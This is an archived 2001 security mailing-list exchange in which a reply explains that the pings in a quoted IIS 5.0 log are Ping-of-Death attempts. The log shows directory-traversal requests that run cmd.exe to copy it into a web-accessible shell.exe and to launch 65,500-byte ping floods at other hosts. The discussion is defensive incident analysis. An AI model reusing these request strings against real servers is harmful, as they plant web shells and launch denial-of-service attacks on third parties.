Those pings are Ping-of-Death attempts with TOS (Type Of Service) options - I don't know why options were used - maybe this increases the possibility of crashing the destination machine...

myrddin_eat_private wrote:
>
> Would like someone to help me understand what is going on here... The 502
> error at the end of these entries would indicate failures, wouldn't
> they? I've been all through the logs on this box, and even though every
> attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe
> shows a 502, it is there.
>
> I'm looking at the times on the log entries and guessing that this was a
> manual attack.
>
> Also, can someone please explain what is being attempted with these pings?
> aaa.aaa.aaa.aaa
> bbb.bbb.bbb.bbb
> ccc.ccc.ccc.ccc.ccc
> ddd.ddd.ddd.ddd.ddd
> are all unique addresses.
>
> #Software: Microsoft Internet Information Services 5.0
> #Version: 1.0
> #Date: 2001-06-19 18:44:15
> #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
> uri-query sc-status cs(User-Agent)
> 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
> 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
> /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
> 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
> /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd
> 502 -
> Free, encrypted, secure Web-based email at www.hushmail.com
>
> ----------------------------------------------------------------------------
>
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see:
>
> http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:09 PDT